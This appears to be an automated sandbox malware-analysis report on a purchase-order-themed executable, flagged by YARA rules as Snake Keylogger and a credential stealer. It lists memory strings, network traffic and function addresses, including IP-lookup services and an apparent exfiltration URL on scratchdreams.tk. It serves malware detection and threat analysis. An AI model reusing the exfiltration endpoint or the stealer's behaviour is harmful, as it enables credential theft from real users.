              Source: AddInProcess32.exe, 00000005.00000002.4523823205.0000000003175000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003216000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.000000000325C000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003223000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.000000000326C000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003230000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003208000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
              Source: AddInProcess32.exe, 00000005.00000002.4523823205.0000000003175000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003216000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.000000000325C000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003223000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.00000000031B8000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.000000000326C000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003169000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003230000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003208000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
              Source: AddInProcess32.exe, 00000005.00000002.4523823205.00000000030B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
              Source: ORDEM DE COMPRA.exe, 00000000.00000002.2184297961.000001FBE99FC000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4521934440.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
              Source: AddInProcess32.exe, 00000005.00000002.4523823205.0000000003216000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.000000000325C000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003223000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.000000000318D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.000000000326C000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003230000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003208000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
              Source: AddInProcess32.exe, 00000005.00000002.4523823205.00000000030B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: AddInProcess32.exe, 00000005.00000002.4523823205.000000000326C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://scratchdreams.tk
              Source: Amcache.hve.9.drString found in binary or memory: http://upx.sf.net
              Source: AddInProcess32.exe, 00000005.00000002.4523823205.000000000318D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
              Source: AddInProcess32.exe, 00000005.00000002.4523823205.000000000318D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.0
              Source: AddInProcess32.exe, 00000005.00000002.4523823205.0000000003175000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003216000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.000000000325C000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003223000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.00000000031B8000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.000000000326C000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003230000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003208000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
              Source: ORDEM DE COMPRA.exe, 00000000.00000002.2184297961.000001FBE99FC000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003175000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4521934440.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
              Source: AddInProcess32.exe, 00000005.00000002.4523823205.0000000003208000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.175
              Source: AddInProcess32.exe, 00000005.00000002.4523823205.0000000003216000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.000000000325C000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003223000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.00000000031B8000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.000000000326C000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003230000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003208000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.175$
              Source: ORDEM DE COMPRA.exe, 00000000.00000002.2184297961.000001FBE99FC000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4521934440.0000000000402000.00000040.00000400.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.000000000326C000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.00000000030B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://scratchdreams.tk
              Source: AddInProcess32.exe, 00000005.00000002.4523823205.000000000326C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://scratchdreams.tk/_send_.php?TS
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
              Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
              Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
              Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
              Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49722 version: TLS 1.2

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 0.2.ORDEM DE COMPRA.exe.1fbe9a1caf8.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 0.2.ORDEM DE COMPRA.exe.1fbe9a1caf8.6.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 0.2.ORDEM DE COMPRA.exe.1fbe9a1caf8.6.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 0.2.ORDEM DE COMPRA.exe.1fbe9a1caf8.6.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 0.2.ORDEM DE COMPRA.exe.1fbe9a3d540.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 0.2.ORDEM DE COMPRA.exe.1fbe9a3d540.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 0.2.ORDEM DE COMPRA.exe.1fbe9a3d540.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 0.2.ORDEM DE COMPRA.exe.1fbe9a3d540.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 0.2.ORDEM DE COMPRA.exe.1fbe9a3d540.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 0.2.ORDEM DE COMPRA.exe.1fbe9a3d540.5.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 0.2.ORDEM DE COMPRA.exe.1fbe9a3d540.5.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 0.2.ORDEM DE COMPRA.exe.1fbe9a3d540.5.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 0.2.ORDEM DE COMPRA.exe.1fbe9a1caf8.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 0.2.ORDEM DE COMPRA.exe.1fbe9a1caf8.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 0.2.ORDEM DE COMPRA.exe.1fbe9a1caf8.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 0.2.ORDEM DE COMPRA.exe.1fbe9a1caf8.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 00000005.00000002.4521934440.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000005.00000002.4521934440.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 00000000.00000002.2184297961.000001FBE99FC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000000.00000002.2184297961.000001FBE99FC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: Process Memory Space: ORDEM DE COMPRA.exe PID: 1756, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: Process Memory Space: ORDEM DE COMPRA.exe PID: 1756, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: Process Memory Space: AddInProcess32.exe PID: 6976, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: Process Memory Space: AddInProcess32.exe PID: 6976, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess Stats: CPU usage > 49%
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeCode function: 0_2_00007FFD348A5D250_2_00007FFD348A5D25
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeCode function: 0_2_00007FFD348A5CA80_2_00007FFD348A5CA8
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeCode function: 0_2_00007FFD348D16580_2_00007FFD348D1658
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeCode function: 0_2_00007FFD348A9F2F0_2_00007FFD348A9F2F
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeCode function: 0_2_00007FFD348A1F650_2_00007FFD348A1F65
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeCode function: 0_2_00007FFD348A08680_2_00007FFD348A0868
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeCode function: 0_2_00007FFD348A05180_2_00007FFD348A0518
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeCode function: 0_2_00007FFD348A05D30_2_00007FFD348A05D3
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeCode function: 0_2_00007FFD348D0F100_2_00007FFD348D0F10
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeCode function: 0_2_00007FFD348A0AE00_2_00007FFD348A0AE0
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeCode function: 0_2_00007FFD348D13580_2_00007FFD348D1358
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeCode function: 0_2_00007FFD348A0ADB0_2_00007FFD348A0ADB
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeCode function: 0_2_00007FFD348ACC000_2_00007FFD348ACC00
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeCode function: 0_2_00007FFD348A0BD30_2_00007FFD348A0BD3
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeCode function: 0_2_00007FFD349C02610_2_00007FFD349C0261
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_014FACC05_2_014FACC0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_014FFA9F5_2_014FFA9F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_014FBFEC5_2_014FBFEC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_014FDEA05_2_014FDEA0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_02F6B3885_2_02F6B388
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_02F6C1F05_2_02F6C1F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_02F661685_2_02F66168
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_02F6C7B15_2_02F6C7B1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_02F6C4D05_2_02F6C4D0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_02F6CA915_2_02F6CA91
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_02F64B315_2_02F64B31
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_02F668E05_2_02F668E0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_02F698B85_2_02F698B8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_02F6BF105_2_02F6BF10
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_02F6BC325_2_02F6BC32
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_02F6F4E85_2_02F6F4E8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_02F635C85_2_02F635C8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_02F6B5525_2_02F6B552
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_02F6EA085_2_02F6EA08
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_02F6E9F85_2_02F6E9F8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_02F6F9415_2_02F6F941
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A644905_2_06A64490
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A60C605_2_06A60C60
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A61DE05_2_06A61DE0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A690805_2_06A69080
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A600405_2_06A60040
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A689B05_2_06A689B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A6D6B05_2_06A6D6B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A6D6C05_2_06A6D6C0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A6CE015_2_06A6CE01
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A6CE105_2_06A6CE10
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A67FF85_2_06A67FF8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A6DF605_2_06A6DF60
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A6DF705_2_06A6DF70
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A644805_2_06A64480
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A6EC695_2_06A6EC69
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A6EC785_2_06A6EC78
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A60C505_2_06A60C50
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A61DD05_2_06A61DD0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A615205_2_06A61520
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A6F5285_2_06A6F528
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A615105_2_06A61510
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A6F5185_2_06A6F518
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A6C5605_2_06A6C560
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A6C5505_2_06A6C550
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A6D2685_2_06A6D268
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A6D2585_2_06A6D258
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A6E3B95_2_06A6E3B9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A6E3C85_2_06A6E3C8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A6DB0A5_2_06A6DB0A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A6DB185_2_06A6DB18
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A610B05_2_06A610B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A6C0F75_2_06A6C0F7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A610C05_2_06A610C0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A6F0C05_2_06A6F0C0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A6F0D05_2_06A6F0D0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A6E8205_2_06A6E820
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A600075_2_06A60007
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A680085_2_06A68008
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A6E8125_2_06A6E812
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A6C9A95_2_06A6C9A9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A6C9B85_2_06A6C9B8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A619805_2_06A61980
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A6F9805_2_06A6F980
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A6C1085_2_06A6C108
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A619705_2_06A61970
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A6F9715_2_06A6F971
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A7AEA85_2_06A7AEA8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A7DAC05_2_06A7DAC0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A7CE285_2_06A7CE28
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A78A585_2_06A78A58
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A7C7D85_2_06A7C7D8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A7BB385_2_06A7BB38
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A790A15_2_06A790A1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A7B4F05_2_06A7B4F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A7D4785_2_06A7D478
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A7A8585_2_06A7A858
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A7C1885_2_06A7C188
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A715F85_2_06A715F8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A7DAAF5_2_06A7DAAF
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A75EB05_2_06A75EB0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A7AE985_2_06A7AE98
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A75EC05_2_06A75EC0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A7CE215_2_06A7CE21
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A786005_2_06A78600
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A75A685_2_06A75A68
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A78A485_2_06A78A48
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A75A585_2_06A75A58
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A76BB85_2_06A76BB8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A73B805_2_06A73B80
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A737FA5_2_06A737FA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A7C7CA5_2_06A7C7CA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A76BC85_2_06A76BC8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A7BB275_2_06A7BB27
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A763085_2_06A76308
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A763185_2_06A76318
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A767605_2_06A76760
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A767705_2_06A76770
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A774A05_2_06A774A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A748805_2_06A74880
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A704885_2_06A70488
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A774905_2_06A77490
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A704985_2_06A70498
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A778E75_2_06A778E7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A708E15_2_06A708E1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A7B4E05_2_06A7B4E0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A708F05_2_06A708F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A778F85_2_06A778F8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A770205_2_06A77020
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A700075_2_06A70007
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A738085_2_06A73808
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A770105_2_06A77010
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A72C685_2_06A72C68
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A7D4685_2_06A7D468
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A700405_2_06A70040
